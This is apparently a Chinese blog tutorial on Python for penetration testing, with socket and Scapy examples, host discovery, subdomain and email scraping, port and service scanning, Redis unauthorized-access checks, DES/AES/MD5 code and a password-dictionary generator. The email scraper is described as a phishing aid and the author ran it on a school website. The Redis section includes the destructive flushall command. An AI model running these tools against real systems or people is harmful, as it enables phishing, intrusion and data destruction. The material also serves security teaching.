0


Python安全攻防-从入门到入狱

居家隔离****闲着无聊
思来想去决定写篇关于

       【
      
      
       P
      
      
       y
      
      
       t
      
      
       h
      
      
       o
      
      
       n
      
      
       攻
      
      
       防
      
      
       】
      
     
    
   
   
    \color{blue}{【Python攻防】}
   
  
 【Python攻防】专栏

没办法-越🥦越想学

请添加图片描述
网上有《Python安全攻防》📕
想深入学习的👦可以买
我没买–毕竟我喜欢白嫖🤪

⛰前言⛰

  • 随着近几年互联网的发展,Python在各行各业发挥着举足轻重的作用。除应用在科学计算、大数据处理等人们熟知的领域外,在信息安全领域中使用也异常广泛。这是因为对于渗透测试工程师来说Python语言不仅上手容易,而且还有大量丰富的开源库。通过Python可以帮助他们又好又快的完成一项任务,以少量的代码便可实现所需功能。从而借助Python打造更安全的💻。

国家网络安全法

敲重点👉中华人民共和国网络安全法👈建议倒背如流

🌋正文🌋

一、Socket网络编程

网络调试助手https://pan.baidu.com/s/1Do-v8XMDaIYJsXRQok5RhQ 提取码:ya4g (便于测试)

套接字(Socket)是计算机之间进行通信的一种约定。通过Socket,一台计算机可以接受其他计算机的数据,也可以向其他计算机发送数据。远程管理软件和黑客软件大多依赖于Socket来实现特定功能的,其包括两个部分:运行于服务器端称之为ServerSocket,运行于客户机端称之ClientSocket。

TCP

TCP是因特网中的传输层协议,使用三次握手协议建立连接。

在这里插入图片描述

TCP_Client.py
import socket

defmain():# 创建TCP套接字
    tcp_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 服务器地址
    sever_ip =input("请输入服务器ip:")
    sever_port =input("请输入服务器端口:")# 连接服务器(元组)
    tcp_client_socket.connect((sever_ip,int(sever_port)))# 输入发送的数据
    data =input("请输入要发送的数据:")# 发送数据
    tcp_client_socket.send(data.encode("utf-8"))#接收数据
    recv_data = tcp_client_socket.recv(1024)print("对方的回复:"recv_data.decode("utf-8"))if __name__ =='__main__':
    main()
nc -lvp 8888

监听8888端口
(一次完整对话)
在这里插入图片描述

TCP_Sever.py
import socket

defmain():# 创建套接字
    tcp_server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)# 绑定本地IP和端口
    tcp_server_socket.bind(("192.168.12.1",8888))# 被动 listen
    tcp_server_socket.listen(128)whileTrue:# 等待客户端信息print("等待客户端连接")
        client_socket,client_addr = tcp_server_socket.accept()print("客户端为:",client_addr)#接收对方发送数据
        recv_data = client_socket.recv(1024)print("接收到信息为:",recv_data.decode("utf-8"))#发送数据到客户端
        client_socket.send("Yasso".encode("utf-8"))
        client_socket.close()if __name__ =="__main__":
    main()

在这里插入图片描述

UDP

UDP 为应用程序提供了一种无需建立连接就可以发送封装的 IP 数据包的方法。

在这里插入图片描述

UDP_Client_send.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)# 目标ip和端口
target_addr =('192.168.12.128',8888)#获取数据
data =input("请输入要发送的数据:")#发送数据
udp_socket.sendto(data.encode('utf-8'),target_addr)

udp_socket.close()
UDP_Client_receive.py
import socket
#创建udp套接字
udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

local_addr=('192.168.12.128',8888)#绑定ip(必须本地)和端口
udp_socket.bind(local_addr)#等待接受对方发送的数据
recv_data = udp_socket.recvfrom(1024)#表示本次接受的最大字节数1024# 显示接受的数据print(recv_data[0].decode('utf-8'))
udp_socket.close()

liunx等待接受数据->win10发送数据->liunx成功接收数据
在这里插入图片描述

nc -ulp 8888

监听udp模式下的8888端口
在这里插入图片描述

私密聊天室
# UDP应用-私密聊天室(极简)import socket

defsend(chat_ip,chat_port):
    udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)"""发送消息"""
    address =(chat_ip,int(chat_port))print(address)
    data =input("请输入发送的消息:")
    udp_socket.sendto(data.encode("utf-8"),address)defreceive():"""接收消息"""
    udp_socket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)# 绑定本地IP和端口
    udp_socket.bind(("192.168.12.1",8888))
    recv_data = udp_socket.recvfrom(1024)print(recv_data[0].decode('utf-8'))defmain():
    chat_ip =input("请输入您聊天对方IP地址:")
    chat_port =input("请输入您聊天对方端口:")# 循环调用whileTrue:print("++++++欢迎进入私密聊天室++++++")print("0:发送消息")print("1:接收消息")print("2:退出聊天")
        function =input("请输入您要用的模块")if function =="0":
            send(chat_ip,chat_port)elif function =="1":
            receive()elif function =="2":breakelse:print("输入有误,请重新输入")if __name__ =='__main__':
    main()

在这里插入图片描述

二、Scapy网络嗅探

Scapy是一个可以让用户发送、侦听和解析并伪装网络报文的Python程序。这些功能可以用于制作侦测、扫描和攻击网络的工具

pip install scapy

安装scapy

pip install ipython

安装交互式shell

Scapy是一个强大的交互式包操作程序。它能够伪造或解码大量协议的数据包,在网络上发送它们,捕获它们,匹配请求和响应,等等。Scapy可以轻松地处理大多数经典任务,如扫描、跟踪、探测、单元测试、攻击或网络发现。它可以代替hping、arpsoof、arp-sk、arping、p0f甚至Nmap、tcpdump和tshark的某些部分

TCP发送数据

TCPsend.py
# -- coding: utf-8 --import time
import threading
import sys
from scapy.allimport*# 数据包应用层数据部分
data ='flag{flag_is_not_here}'# src:源地址 、sport:源端口、dst:目标地址、dport:目标端口
pkt = IP(src='192.168.12.128', dst='192.168.12.166')/ TCP(sport=4444, dport=6666)/ data

# 间隔一秒发送一次   总共发送5次   发送网卡口(iface):eth0
send(pkt, inter=1, count=5, iface="eth0")

在这里插入图片描述

基于ICMP协议的存活主机探测

ICMP协议是一种面向无连接的协议,用于传输出错报告控制信息。它是一个非常重要的协议,它对于网络安全具有极其重要的意义。 属于网络层协议,主要用于在主机与路由器之间传递控制信息,包括报告错误、交换受限控制和状态信息等。当遇到IP数据无法访问目标、IP路由器无法按当前的传输速率转发数据包等情况时,会自动发送ICMP消息。

判断是否为活跃主机,只需要向其发送一个ICMP请求,如果这台主机处于活跃状态,那么它在收到这个请求之后就会给出一个回应。
# -- coding: utf-8 --from scapy.allimport*# 构造IP包头构造ICMP包头加载发送数据包函数for i inrange(1,254):# 整个个网段
     ip="192.168.12."+str(i)# 设置IP地址
     pkt=IP(dst=ip,src="192.168.12.128")/ICMP(type="Echo-request")#ICMP包的类型为Echo request——回显请求(Ping请求)
     rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。# 如果该数据包有回应则输出if rep:print("The  "+ rep[IP].src +"  is live")

在这里插入图片描述

基于TCP/UDP的主机发现

基于TCP、UDP的主机发现属于四层主机发现是一个位于传输层的协议。可以用来探测远程主机存活、端口开放、服务类型以及系统类型等信息,相比于三层主机发现更为可靠用途更广.

TCP
工作原理主要依据目标主机响应数据包中flags字段,如果flags字段有值,则表示主机存活,该字段通常包括SYN、FIN、ACK、PSH、RST、URG六种类型。SYN表示建立连接,FIN表示关闭连接,ACK表示应答,PSH表示包含DATA数据传输,RST表示连接重置,URG表示紧急指针。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
     ip="192.168.12."+str(i)# 设置IP地址
     pkt=IP(dst=ip)/TCP(flags="A",dport=4444)#响应数据包中flags值判断主机是否存活
     rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。if rep:# 如果该数据包有相应则输出print("The  "+ rep[IP].src +"  is live")
UDP
UDP是向目标主机一个没有开放的端口发送数据,目标主机会返回一个目的端口不可达的ICMP报文,以此来判断主机是否在线。如果主机不在线,或者目标端口开放,UDP探测是不会收到响应包的。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
     ip="192.168.12."+str(i)# 设置IP地址
     pkt=IP(dst=ip)/UDP(dport=6666) 
     rep=sr1(pkt,timeout=1,verbose=False)# 发送和接受数据包,超时时间为1秒,设置无过程回显。if rep:# 如果该数据包有相应则输出print("The  "+ rep[IP].src +"  is live")
wireshark拦截

在这里插入图片描述

基于ARP协议的主机发现

地址解析协议,即ARP,是根据IP地址获取物理地址的一个TCP/IP协议。主机发送信息时将包含目标IP地址的ARP请求广播到局域网络上的所有主机,并接收返回消息,以此确定目标的物理地址;收到返回消息后将该IP地址和物理地址存入本机ARP缓存中并保留一定时间,下次请求时直接查询ARP缓存以节约资源。

ARP
对以太网内的每个主机都进行ARP请求。若主机存活,则会响应我们的ARP请求,否则不会响应.因为ARP涉及网络层和数据链路层所以需要使用Scapy中的Ether和ARP。
# -- coding: utf-8 --from scapy.allimport*for i inrange(1,254):# 整个个网段
     ip_list=[]
     ip="192.168.12."+str(i)# 设置IP地址# 发送ARP包# 二层发包,需要添加以太网头部,所以要写成Ether/ARP# 因为最底层用到了二层,所以要用srp()发包
     ans=srp(Ether(dst='FF:FF:FF:FF:FF:FF')/ARP(op=1,pdst=ip,hwdst='00:00:00:00:00:00'),timeout=1,verbose=False)if ans[0].res:print("The  "+ip+"  is live")

在这里插入图片描述

三、信息搜集

IP查询

IP查询是通过当前所获取到的URL去查询对应IP地址的过程。可以应用Socket库函数中的gethostbyname()获取域名所对应的IP值°

import socket
domain =input("请输入要查询的域名:")
ip = socket.gethostbyname(domain)print("IP地址为:",ip)

在这里插入图片描述

Whois查询

whois模块查询域名www.baidu.com的注册信息

pip install python-whois

安装模块

from whois import whois
data = whois('www.baidu.com')print(data)

在这里插入图片描述

子域名挖掘

域名可以分为顶级域名、—级域名、二级域名等。子域名(subdomam)是顶级域名(一级域名或父域名)的下—级。例如mail.example.com和calendar.example.com是example.com的两个子域,而example.com则是顶级域.com的子域。在测试过程中测试目标主站时如果未发现任何相关漏洞,此时通常会考虑⛏︎目标系统的子域名。子域名⛏︎方法有很多种,例如,搜索引擎、子域名破解、字典查询等。

import requests                      
from bs4 import BeautifulSoup  
from urllib.parse import urlparse   
import sys 

defbing_search(site,pages):
    Subdomain =[]
    headers ={#HTTP Headers是HTTP请求和相应的核心,它承载了关于客户端浏览器,请求页面,服务器等相关的信息'User-Agent':'Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36',#是HTTP协议中的一部分,属于头域的组成部分,是一种向访问网站提供你所使用的浏览器类型、操作系统及版本、CPU 类型、浏览器渲染引擎、浏览器语言、浏览器插件等信息的标识'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',#属于请求报头,代表发送端(客户端)希望接受的数据类型'Referer':"https://cn.bing.com",#表示一个来源}for i inrange(1,int(pages)+1):
        url ="https://cn.bing.com/search?q=site%3a"+site+"&go=Search&qs=ds&first="+str((int(i)-1)*10)+"&FORM=PERE"
        html = requests.get(url,headers=headers)#获取HTML网页,对应HTTP的GET
        soup = BeautifulSoup(html.content,'html.parser')
        job_bt = soup.findAll('h2')#返回一个包含HTML文档标题标签h2的列表for i in job_bt:
            link = i.a.get('href')
            domain =str(urlparse(link).scheme +"://"+urlparse(link).netloc)#储存子域名if domain in Subdomain:passelse:
                Subdomain.append(domain)print(domain)if __name__ =='__main__':iflen(sys.argv)==3:
        site = sys.argv[1]
        page = sys.argv[2]else:print("usage: %s baidu.com 10"% sys.argv[0])#输出帮助信息
        sys.exit(-1)
    Subdomain = bing_search(site,page)
python Subdomain.py baidu.com 20

数字20表示获取Ping引擎页数
在这里插入图片描述
力推👉️在线子域名查询👈️

邮件爬取

  在针对目标系统进行渗透的过程中,如果目标服务器安全性很高,通过服务器很难获取目标权限时,通常会采用社工的方式对目标服务进行进一步攻击🤺。针对搜索界面的相关📩信息进行爬取、处理等操作之后。利用获得的📫账号批量发送🎣📩,诱骗、欺诈目标用户或管理员进行账号登录或点击执行,进而获取目标系统的其权限。

import sys
import getopt
import requests
from bs4 import BeautifulSoup
import re

#主函数,传入用户输入的参数defstart(argv):
    url =""
    pages =""iflen(sys.argv)<2:print("-h 帮助信息;\n")
        sys.exit()#定义异常处理try:
        banner()
        opts,args = getopt.getopt(argv,"-u:-p:-h")except getopt.GetoptError:print('Error an argument!')
        sys.exit()for opt,arg in opts:if opt =="-u":
            url = arg
        elif opt =="-p":
            pages = arg
        elif opt =="-h":print(usage())

    launcher(url,pages)#banner信息defbanner():print('\033[0;31;42m 爬虫不控频,亲人两行泪 \033[0m')#使用规则defusage():print('-h: --help 帮助;')print('-u: --url 域名;')print('-p: --pages 页数;')print('eg: python -u "www.baidu.com" -p 100'+'\n')
    sys.exit()#漏洞回调函数deflauncher(url,pages):#调用bing_search()和baidu_search()函数并且将bing爬到的和baidu爬到的合并去重
    email_num =[]
    key_words =['email','mail','mailbox','邮件','邮箱','postbox']for page inrange(1,int(pages)+1):for key_word in key_words:
            bing_emails = bing_search(url,page,key_word)
            baidu_emails = baidu_search(url,page,key_word)
            sum_emails = bing_emails + baidu_emails
            for email in sum_emails:if email in email_num:passelse:print(email)withopen('data.txt','a+')as f:
                        f.write(email +'\n')
                    email_num.append(email)#bingSearchdefbing_search(url,page,key_word):#绕过Bing搜索引擎反爬(校验referer和cookie)
    referer ="http://cn.bing.com/search?q=email+site%3abaidu.com&qs=n&sp=-1&pq=emailsite%3abaidu.com&first=1&FORM=PERE1"
    conn = requests.session()
    bing_url ="https://cn.bing.com/search?q="+key_word+"site%3a"+url+"&qs=n&sp=-1&pq="+key_word+"site%3a"+url+"&first="+str((page-1)*10)+"&FORM=PERE1"
    conn.get('http://cn.bing.com',headers=headers(referer))
    r = conn.get(bing_url,stream=True,headers=headers(referer),timeout=8)
    emails = search_email(r.text)return emails

#baiduSearchdefbaidu_search(url,page,key_word):#绕过百度搜索引擎的反爬(JS请求链)
    email_list =[]
    emails =[]
    referer ="https://www.baidu.com/s?wd=email+site%3Abaidu.com&pn=1"
    baidu_url ="https://www.baidu.com/s?wd="+key_word+"+site%3A"+url+"&pn="+str((page-1)*10)
    conn = requests.session()
    conn.get(referer,headers=headers(referer))
    r = conn.get(baidu_url, headers=headers(referer))
    soup = BeautifulSoup(r.text,'lxml')
    tagh3 = soup.find_all('h3')for h3 in tagh3:
        href = h3.find('a').get('href')try:
            r = requests.get(href, headers=headers(referer),timeout=8)
            emails = search_email(r.text)except Exception as e:passfor email in emails:
            email_list.append(email)return email_list

defsearch_email(html):
    emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+",html,re.I)#正则表达式获取邮箱号码return emails

defheaders(referer):
    headers ={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36','Accept':'*/*','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip,deflate','Referer':referer}return headers

if __name__ =='__main__':#定义异常try:
        start(sys.argv[1:])except KeyboardInterrupt:print("interrupted by user,killing all threads...")

试了下某学校网站,爬到不少
溜了溜了🎿🎿
在这里插入图片描述

端口扫描

import socket
import threading

defmain(target):print('开始扫描---')for port inrange(1,65535):
        t = threading.Thread(target=hackport,args=(target,port))
        t.start()defhackport(target,port):try:
        res = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        res.connect((target,port))#双括号元组print("%s:%d 端口开放"%(target,port))
        res.close()except:passif __name__ =='__main__':
    target=input("请输入要扫描的IP:")
    main(target)print('***扫描完毕***')

内网靶机
在这里插入图片描述

nmap -sV -p- 192.168.12.134

在这里插入图片描述

服务识别

from optparse import OptionParser
import time
import socket
import os
import re

SIGNS =(# 协议 | 版本 | 关键字b'FTP|FTP|^220.*FTP',b'MySQL|MySQL|mysql_native_password',b'oracle-https|^220- ora',b'Telnet|Telnet|Telnet',b'Telnet|Telnet|^\r\n%connection closed by remote host!\x00$',b'VNC|VNC|^RFB',b'IMAP|IMAP|^\* OK.*?IMAP',b'POP|POP|^\+OK.*?',b'SMTP|SMTP|^220.*?SMTP',b'Kangle|Kangle|HTTP.*kangle',b'SMTP|SMTP|^554 SMTP',b'SSH|SSH|^SSH-',b'HTTPS|HTTPS|Location: https',b'HTTP|HTTP|HTTP/1.1',b'HTTP|HTTP|HTTP/1.0',)defregex(response, port):
    text =""if re.search(b'<title>502 Bad Gateway', response):
        proto ={"Service failed to access!!"}for pattern in SIGNS:
        pattern = pattern.split(b'|')if re.search(pattern[-1], response, re.IGNORECASE):
            proto ="["+port+"]"+" open "+ pattern[1].decode()breakelse:
            proto ="["+port+"]"+" open "+"Unrecognized"print(proto)defrequest(ip,port):
    response =''
    PROBE ='GET / HTTP/1.0\r\n\r\n'
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    result = sock.connect_ex((ip,int(port)))if result ==0:try:
            sock.sendall(PROBE.encode())
            response = sock.recv(256)if response:
                regex(response, port)except ConnectionResetError:passelse:pass
    sock.close()defmain():
    parser = OptionParser("Usage:%prog -i <target host> ")# 输出帮助信息
    parser.add_option('-i',type='string',dest='IP',help='specify target host')# 获取ip地址参数
    parser.add_option('-p',type='string', dest='PORT',help='specify target host')# 获取ip地址参数
    options,args = parser.parse_args()
    ip = options.IP
    port = options.PORT
    print("Scan report for "+ip+"\n")for line in port.split(','):
        request(ip,line)
        time.sleep(0.2)print("\nScan finished!....\n")if __name__ =="__main__":try:
        main()except KeyboardInterrupt:print("interrupted by user, killing all threads...")

在这里插入图片描述

系统识别

根据按照目标主机返回的响应数据包中的TTL值来判断操作系统类型的原理

from optparse import OptionParser
import os
import re

defmain():
    parser = OptionParser("Usage:%prog -i <target host>")
    parser.add_option('-i',type='string', dest='IP',help='specify target host')
    options, args = parser.parse_args()
    ip = options.IP
    ttl_scan(ip)defttl_scan(ip):
    ttlstrmatch = re.compile(r'ttl=\d+')#正则匹配取出TTL值
    ttlnummatch = re.compile(r'\d+')
    result = os.popen("ping -c 1 "+ip)# 调用os.popen()函数执行ping命令
    res = result.read()for line in res.splitlines():
        result = ttlstrmatch.findall(line)if result:
            ttl = ttlnummatch.findall(result[0])ifint(ttl[0])<=64:# ttl值小于等于64时,操作系统为linux系统print("%s is Linux/Unix"% ip)else:#否则就是windowsprint("%s is Windows"% ip)breakelse:passif __name__ =='__main__':
    main()

在这里插入图片描述

敏感目录探测

#-*- coding:utf-8 -*-import requests

headers ={"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0) Gecko/20100101 Firefox/6.0"}
url =input("url: ")
txt =input('字典.txt')# 同级目录下的字典
url_list =[]if txt =="":
    txt ="字典.txt"try:withopen(txt,'r')as f:
        url_list = f.read().split('\n')except:print("error")for li in url_list:
    conn ="http://"+ url +"/"+ li
    try:
        response = requests.get(conn, headers=headers)print("%s --------------- %s"%(conn, response))except:# print("%s --------------- %s" % (conn, e.code))pass

在这里插入图片描述

四、网络空间搜索引擎

平常用fofa,不过貌似最近摊上事了,域名被列入了黑名单

搜索引擎是指从互联网搜集信息,经过一定整理以后,提供给用户进行查询的系统传统搜索引擎对我们来说并不陌生,像Google、百度等,每天我们几乎都会用它们来搜索消息。与传统搜索引擎相比,网络空间搜索引擎有很大不同,其搜索目标为全球的IP地址,实时扫描互联网和解析各种设备,对网络中的设备进行探测识别和指纹分析,并将其扫描的目标信息进行分布式存储,供需求者检索使用。传统的网络空间搜索模型框架一般由五部分组成:扫描和指纹识别、分布存储、索引、UI界面以及调度程序。

网络空间搜索引擎🕷️能够帮助安全研究人员针对APT组织、攻击方式等情况进行分析;对于公司安全管理人员🧑‍💻,能够帮助他们进行网络资产匹配、安全评估等;对于安全白帽子,能够帮助渗透测试人员在与目标非交互的情况下搜集信息,例如,搜索资产系统类型开放端口等。

Quake网络空间测绘系统(360)
资产狩猎框架-AssetsHunter
Censys搜索引擎
Zoomeye(钟馗之眼)
Shodan(撒旦)

Zoomeye(钟馗之眼)

Zoomeye支持公网设备指纹检索和Web指纹检索。Web指纹识别包括应用名版本、前端框架、后端框架、服务端语言、服务器操作系统、网站容器、内容管理系统和数据库等。设备指纹识别包括应用名、版本、开放端口、操作系统、服务名、地理位置等,直接输人关键词即可开始检索。

设备检索指纹语法语法描述实例app:组件名组件名称app:“Apache httpd”ver:组件版本组件的版本号ver:“2.2.16”port:端口号目标系统开放端口port:3389os:操作系统目标操作系统类型os:linuxservice:服务名系统运行的服务类型service:“ssh”hostname:主机名目标系统的主机名hostname:google.comcountry:国家或者地区代码目标系统的地理位置country:UScity:城市名称目标系统所在城市city:“beijing”ip:指定的IP地址目标系统对应的IP地址ip:8.8.8.8org:组织结构所属的组织结构org:“Vimpelcom”asn:自治系统号自治系统编号asn:42839ssl:SSL证书SSL证书ssl:“corp.google.com”Web指纹检索语法语法描述实例app:组件名组件名称app:“Apache httpd”ver:组件版本组件的版本号ver:“2.2.16”site:网站域名目标网站域名site:google.comos:操作系统目标操作系统类型os:linuxtitle:页面标题网站标题site:Nginxkewords:页面关键字网站页面关键字keywords:Nginxdesc:页面说明页面描述字段desc:Nginxheaders:请求头部HTTP请求中的Headersheaders:Servercountry:国家或者地区代码目标系统的地理位置country:UScity:城市名称目标系统所在城市city:“beijing”ip:指定的IP地址目标系统对应的IP地址ip:8.8.8.8org:组织机构所属的组织机构org:“Vimpelcom”asn:自治系统号自治系统编号asn:42839

调用ZoomEye(钟馗之眼)的API接口实现自动化信息搜集

ZoomEye-API 分为两种验证方式,API-KEY 和登录验证

ZoomEye API手册

curl -X POST https://api.zoomeye.org/user/login -d '{"username": "28********@qq.com","password": "123456"}'

在这里插入图片描述

使用host方法,查询开放6379端口的服务器IP地址,并打印出检索到的lP地址和端口号
import requests
import json
from bs4 import BeautifulSoup

data_info ={'username':"z***@qq.com",'password':"P******X"} 
respond1= requests.post(url ='https://api.zoomeye.org/user/login',json = data_info)

authorization ={'Authorization':'JWT '+"eyJhbGciOiJIU***kpXVCJ9.eyJpZGVudG*MzA1***********mJmIjoxN*I-ZMB0zG*tPZK11FCo"}
url ="https://api.zoomeye.org/host/search?query=port:6379&page=1&facet=app,os"
respond = requests.get(url = url,headers = authorization)

data = json.loads(respond.text)for line in data['matches']:print(line['ip']+': '+str(line['portinfo']['port']))

在这里插入图片描述

Shodan

Shodan主要获取互联网中设备中的服务、位置、端口、版本等信息,目前比较受欢迎的内容有webcam、linksys、 cisco、 nctgear、SCADA等。通过不同的搜索语法可以做到批量搜索漏洞主机、统计中病毒主机、进行弱口令爆破、获取shell等功能。

Shoda常用语法语法描述实例city:城市名称城市city:“beijing”country:国家或者地区代码国家的简称countIy:“CN”geo:经纬度经纬度geo:“46.9481,7.4474”hostname:主机名主机名或域名hostname:“baidu”ip:IP地址IP地址ip:“11.11.11.11”isp: ISP供应商ISP供应商isp:“China Telecom”org:组织或者公司组织或者公司org:“baidu”os:操作系统操作系统os:Windows 7 or 8port:端口号端口号port:80net:CIDR格式的IP地址CIDR格式的IP地址net:“190.30.40.0/24”versjon:软件版本号软件版本version:“4.4.2”vuln:漏洞编号漏洞CVE编号vuln:CVE-2020-0787http.server:服务类型http请求返回中server的类型http.server:apachehttp.status:请求状态码http请求返回响应码的状态http.stams:200

调用Shodan的API接口实现自动化信息搜集

使用Python去调用Shodan的API接口可以实现自动化信息搜集,首先需要注册🧑,在MyAccount中可以👁️APIKey.

在这里插入图片描述
Shodan API官方文档

import shodan
import json

Shodan_API_KEY ='q************************0'
shodan_api = shodan.Shodan(Shodan_API_KEY)# ip = shodan_api.host('8.8.8.8')     # host()方法获取指定IP的相关信息# 搜索JAWS摄像头,并将IP和端口打印出来
results = shodan_api.search('JAWS/1.0')print("共有%s"%results['total']+"条搜索结果")for result in results['matches']:print(result['ip_str']+":"+str(result['port']))

在这里插入图片描述

小结🌇

  作为渗透测试的👻-信息搜集,信息搜集的完整性决定了你渗透测试的结果.

工欲其事,必先利其器

。让Python完全替代现有的渗透测试工具不太现实,但可以让我们更好的理解我们当今大多数渗透测试工具的原理,为我们以后⚒⚒⚒⚒⚒⚒工具打下基础。

五、漏洞检测与防御

Redis未授权访问漏洞

未授权访问漏洞可以理解为安全配置、权限认证、授权页面存在缺陷,导致其他用户🧑可以直接访问🔎,从而引发权限可被操作数据库、网站目录等敏感信息泄露。目前存在未授权访问漏洞的服务主要包括:NFS、 Samba、LDAP、Rsync、FTP、GitLab、Jenkms、MongoDB、Redis、ZooKeeper、ElasticSearch、Memcache、CouchDB、Docker、Solr、Hadoop等。

通过手工🛠进行未授权访问验证,在安装Redis服务的Kall系统中连接☌,如果目标系统存在未授权访问漏洞,则可以成功连接☌

redis-cli -h 192.168.12.128

在本地搭建的redis漏洞环境

keys *

查看key和其对应的值

get user

获取用户名

get password

获取登录指令

flushall

删除所有数据

info

返回关于 Redis 服务器的各种信息和统计数值
在这里插入图片描述

Python批量检测Redis未授权访问漏洞

import sys
import socket
'''
socket连接远程主机的IP及端口号,发送info命令.利用recvdata()函数接收目标
主机返回的数据,当时返回的数据含有'redis verslon'字符串时,表明存在未授权访问漏
洞,否则不存在.
'''# 随便找了几个ip测试下withopen('redis.txt',"r")as f:
    url= f.read()defmain():for ip in url.split():
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(1)# 限制超时1秒
        s.connect((ip,6379))
        s.send('INFO\r\n'.encode('utf-8'))# info命令返回服务器版本
        recv_data= s.recv(1024)if"redis_version"in recv_data.decode('utf-8'):print(ip+":存在Redis未授权访问漏洞")else:pass
        s.close()

f.close()if __name__ =='__main__':
    main()

在这里插入图片描述
⛸️⛸️⛸️⛸️⛸️⛸️

漏洞防御与检测

Redis未授权访问漏洞产生的危害☠︎☠︎☠︎很大,甚至可以批量获取目标系统的权限,有必要针对该漏洞进行严格限制和防御。针对该漏洞的防御方式有很多,下面是常见的🛡︎🛡︎🛡︎方式:
1️⃣禁止远程使用高危命令。
2️⃣低权限运行Redis服务。
3️⃣禁止外网访问Redis。
4️⃣阻止其他用户👤添加新的公钥,将authorized-keys的权限设置为对拥有者只读。

六、数据加密

根据明文处理方式的不同分为序列密码分组密码,根据密钥🔑的使用个数不同分为对称加密算法非对称加密算法.

常见的对称加密算法包括DES、AES等

Python实现DES加解密

通过Cryptodome库函数实现对字符串进行DES加解密。由于DES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB
from Crypto.Cipher import DES
import binascii

key ='12345678'# 密钥
des = DES.new(key.encode('utf-8'),DES.MODE_ECB)# ECB模式
text =input("请输入要加密的字符串:")# 要加密的字符串
text = text +(8-(len(text)%8))*'='# 数据块对齐# 加密
encrypt_text = des.encrypt(text.encode('utf-8'))#
Result1 = binascii.b2a_hex(encrypt_text)# 字符串转为16进制print("DES加密后:"+str(Result1))# 解密
decrypt_text = binascii.a2b_hex(Result1)
Result2 = des.decrypt(decrypt_text)print("DES解密后:"+str(Result2))

在这里插入图片描述

Python实现AES加解密

AES加密算法的轮函数采用代替/置换网络结构,包括S盒变换(ByteSub)、行移位变换(ShjhRow)、列混合变换(MixColumn)、圈密钥加变换(AddRoundKey)。

AES为分组密码的加密方式,其工作模式有五种: ECB、CBC、CTR、CFB、OFB.
from Crypto.Cipher import AES
import binascii

key ='abcdefghabcdefgh'# 密钥长度须为8字节
aes = AES.new(key.encode(),AES.MODE_ECB)# ECB模式
text =input("请输入要加密的字符串:")# 要加密的字符串需为8字节的倍数
text = text +(16-(len(text)%16))*'='# 数据块对齐# 加密
encrypt_text = aes.encrypt(text.encode())  
Result1 = binascii.b2a_hex(encrypt_text)# 字符串转为16进制print("AES加密后:"+str(Result1))# 解密
decrypt_text = binascii.a2b_hex(Result1)# 16进制转为字符串
Result2 = aes.decrypt(decrypt_text)print("AES解密后:"+str(Result2))

在这里插入图片描述

Python实现MD5加密

MD5是以512位的分组来处理输人的信息,并且将每一分组又划分成16个32位的子分组,经过了一系列的处理后,算法的输出由四个32位的分组组成,将这四个32位的分组结合后将生成一个128位的散列值.

用Python实现MD5加密时用到的是hashlib模块,可以通过hashlib标准库使用多种Hash算法,如SHA1、SHA224、SHA256、SHA384、SHA512和MD5算法等。
from hashlib import md5

defmain(s):
    new_md5 = md5()
    new_md5.update(s.encode('utf-8'))print(new_md5.hexdigest())if __name__ =='__main__':
    main(input("请输入要加密的字符串:"))

在这里插入图片描述

七、身份认证

身份认证攻击总的来说分为三种攻击🤺方式:
字典📕破解:利用工具提前生成好字典文件,只需让破解脚本对📕的内容逐一尝试破解即可。这种方式效率高,成功率一般。
暴力💣破解:这种方式最为粗暴,不需要📕。将所有可能性的密码组合(如字母+数字+特殊字符)全部进行尝试。这种方式需要花费大量的时间,效率很低,但是在没有其他条件限制的情况下肯定能猜到密码,成功率高。
混合破解:多种破解技术结合使用。这种方法效率高,成功率也较高。

Python社工字典生成

import itertools

defReadInformationList(infolist):for i inrange(1,3):
        lines =input('请输入第%s个关键字:'%i)
        infolist.append(lines.strip())defCreateNumberList(numberList):
    words ="0123456789"
    itertoolsNumberList = itertools.product(words,repeat=2)# 所有两位数for number in itertoolsNumberList:
        numberList.append("".join(number))defCreateSpecialList(specialList):
    specialWords ="~!@#$%^&*()_+`-=,/:><.\|"# 特殊字符for i in specialWords:
        specialList.append("".join(i))# 创建Combinatjon()函数字典生成算法主体 可自定义组合算法# 关键字与两位数和一位特殊字符组合defmain(dictionaryFile):for a inrange(0,len(infolist)):for b inrange(0,len(numberList)):for c inrange(0,len(specialList)):
                dictionaryFile.append(infolist[a]+ numberList[b]+ specialList[c])

                dictionaryFile.append(infolist[a]+ specialList[c]+ numberList[b])

                dictionaryFile.append(specialList[c]+ infolist[a]+ numberList[b])

                dictionaryFile.append(specialList[c]+ numberList[b]+ infolist[a])

                dictionaryFile.append(numberList[b]+ infolist[a]+ specialList[c])

                dictionaryFile.append(numberList[b]+ specialList[c]+ infolist[a])for i in dictionaryFile:print(i)if __name__ =='__main__':
    infolist =[]
    ReadInformationList(infolist)
    
    numberList =[]
    CreateNumberList(numberList)

    specialList =[]
    CreateSpecialList(specialList)

